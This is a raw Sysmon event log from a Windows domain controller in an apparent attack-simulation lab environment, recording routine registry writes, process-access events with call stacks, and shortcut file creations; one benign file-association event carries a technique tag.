13:30:04.342{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe\REGISTRY\A\{da039e6a-39ea-1caa-6d1c-5651aea05e0f}\Root\InventoryDevicePnp\swd/scdeviceenumbus/1\DriverVerVersion10.0.14393.0 13241300x800000000000000010902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localInvDB-DriverVerSetValue2021-01-14 13:30:04.342{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe\REGISTRY\A\{da039e6a-39ea-1caa-6d1c-5651aea05e0f}\Root\InventoryDevicePnp\swd/scdeviceenumbus/0\DriverVerVersion10.0.14393.0 13241300x800000000000000010901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localInvDB-DriverVerSetValue2021-01-14 13:30:04.342{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe\REGISTRY\A\{da039e6a-39ea-1caa-6d1c-5651aea05e0f}\Root\InventoryDevicePnp\terminput_bus/umb/2&2c22bcc9&0&session2mouse0\DriverVerVersion10.0.14393.0 13241300x800000000000000010900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localInvDB-DriverVerSetValue2021-01-14 13:30:04.326{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe\REGISTRY\A\{da039e6a-39ea-1caa-6d1c-5651aea05e0f}\Root\InventoryDevicePnp\terminput_bus/umb/2&2c22bcc9&0&session2keyboard0\DriverVerVersion10.0.14393.0 10341000x800000000000000010925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:05.482{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 11241100x800000000000000010932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:06.748{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXEC:\Users\Administrator\Links\Downloads.lnk2021-01-14 09:08:05.260 11241100x800000000000000010931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:06.748{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXEC:\Users\Administrator\Links\Desktop.lnk2021-01-14 09:08:05.260 10341000x800000000000000010930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:06.685{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000010929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:06.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:06.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:06.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:06.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1042SetValue2021-01-14 13:30:07.935{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXEHKU\S-1-5-21-2738482597-1131698221-3520544381-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 11241100x800000000000000010970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.920{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer (7).lnk2021-01-14 13:30:07.920 10341000x800000000000000010969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.701{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.685{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.685{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.685{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 